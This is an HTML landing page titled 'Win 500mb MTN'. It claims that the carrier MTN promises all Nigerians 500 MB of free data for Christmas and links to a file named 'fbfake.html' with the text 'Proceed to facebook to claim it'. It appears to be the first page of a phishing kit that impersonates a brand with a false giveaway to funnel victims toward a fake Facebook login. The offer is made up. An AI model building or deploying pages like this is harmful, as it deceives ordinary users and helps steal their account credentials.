<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Win 500mb MTN</title>
</head>
<body>
    <style> 
        *{
            margin: 0;
            padding: 0;
        }
        body{
            background: url(How-to-share-data-on-mtn.jpg);
            background-repeat: no-repeat;
            background-size: cover;
        }
        .container{
            background-color: yellow;
            width: 100%;
            height: 100vh;
            opacity: 0.8;
            position: relative;
        }
        h2{
            font-size: 5em;
            position: absolute;
            top: 100px;
            left: 50px;
        }
        p{
            font-size: 2em;
            position: absolute;
            top: 200px;
            left: 80px;
        }
        pre{
            font-size: 2em;
            position: absolute;
            top: 400px;
            left: 100px;
            color: white;
            background-color: black;
            padding: 15px 10px;
        }
        pre a{
            color: white;
            text-decoration: none;
        }

        @media (max-width: 1000px){
            body{
                background: url(mtn1.jpg);
                background-repeat: no-repeat;
                background-size: cover;
            }
            h2{
                font-size: 10vw;
                text-align: center;
            }
            p{
                font-size: 5vw;
                text-align: center;
            }
            pre{
                text-align: center;
                font-size: 3vw;
            }
        }
    </style>
    <div class = "container">
        <h2>Win 500mb of MTN.</h2>
        <p>Mtn promises all nigerians 500mb<br>to enjoy their christmas holiday.</p>
        <pre>&#8594;<a href="fbfake.html">Proceed to facebook to claim it</a></pre>
    </div>
</body>
</html>
